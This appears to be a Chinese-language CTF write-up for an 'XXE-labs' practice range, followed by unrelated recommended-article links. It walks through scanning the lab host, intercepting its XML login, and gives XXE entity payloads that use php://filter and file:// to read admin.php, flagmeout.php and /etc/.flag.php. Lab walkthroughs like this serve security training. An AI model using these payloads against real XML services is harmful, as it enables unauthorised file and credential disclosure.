XXE-labs靶场通关攻略

环境地址自行查找

1.寻找靶机地址

使用工具goby进行扫描 因为我的靶场是搭在ubuntu上 直接查找系统是Ubuntu的就可以找到

靶机IP 172.16.1.183

2.访问靶场

3.使用目录扫描工具进行扫描

使用kali自带的dirsearch进行扫描 可以看到一个robots.txt文件

4.访问robots.txt文件

可以看到有两个目录 一个是admin.php 另一个是xxe

访问admin.php无法访问

访问xxe 发现是一个登录页面

5.进行抓包

使用burp进行登录页面抓包

可以看到是使用xml语言编写的

6.发送到重放器

当我们修改name时 发现页面有回显

7.读取admin.php文件

通过php协议base64加密读写admin.php

<!DOCTYPE r [

<!ELEMENT r ANY>

<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

]>

8.进行解码

9.查看用户信息

查看解码的结果 可以看到有账号和密码

10.对密码进行解码

使用在线网址进行解密就可以得到密码

11.进行登录

172.16.1.183/xxe/admin.php

可以看到flag

点击可以发现又一个php文件

12.读取flagmeout.php文件

<!DOCTYPE r [

<!ELEMENT r ANY>

<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">

]>

13.进行base64解码

发现flag还要进行base32解码

解码之后 还要进行base64解码 可以看到flag的地址

14.读取flag文件

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE r [

<!ELEMENT r ANY>

<!ENTITY test SYSTEM "file:///etc/.flag.php">

]>

15.将乱码放在php文件

16.访问编写的php文件

页面可以看到flag文件

相关推荐
JohnsonXin19 分钟前
【兼容性记录】video标签在 IOS 和 安卓中的问题
android·前端·css·ios·h5·兼容性
服装学院的IT男1 小时前
【Android 13源码分析】WindowContainer窗口层级-3-实例分析
android·数据库
Python私教2 小时前
JavaScript 基于生成器的异步编程方案相关代码分享
android·javascript·okhttp
文 丰3 小时前
【Android Studio】app:compileDebugJavaWithJavac FAILED解决办法
android·ide·android studio
寰宇软件3 小时前
Android横竖屏 mdpi hdpi xhdpi xxhdpi xxxhdpi
android
文 丰3 小时前
【Android Studio】2024.1.1最新版本AS调试老项目(老版AS项目文件、旧gradle)导入其他人的项目
android·ide·android studio
Yongqiang Cheng4 小时前
在线查看 Android 系统源代码 Android Code Search
android·在线查看·android 系统源代码·code search
CYRUS STUDIO4 小时前
LineageOS源码下载和编译(Xiaomi Mi 6X,wayne)
android·刷机·lineageos·android源码编译
竹等寒6 小时前
中间件常见漏洞
android·web安全·网络安全·中间件
zeruns8027 小时前
如何用安卓玩Java版Minecraft,安卓手机安装我的世界Java版游戏的教程
android·java·智能手机·minecraft·mc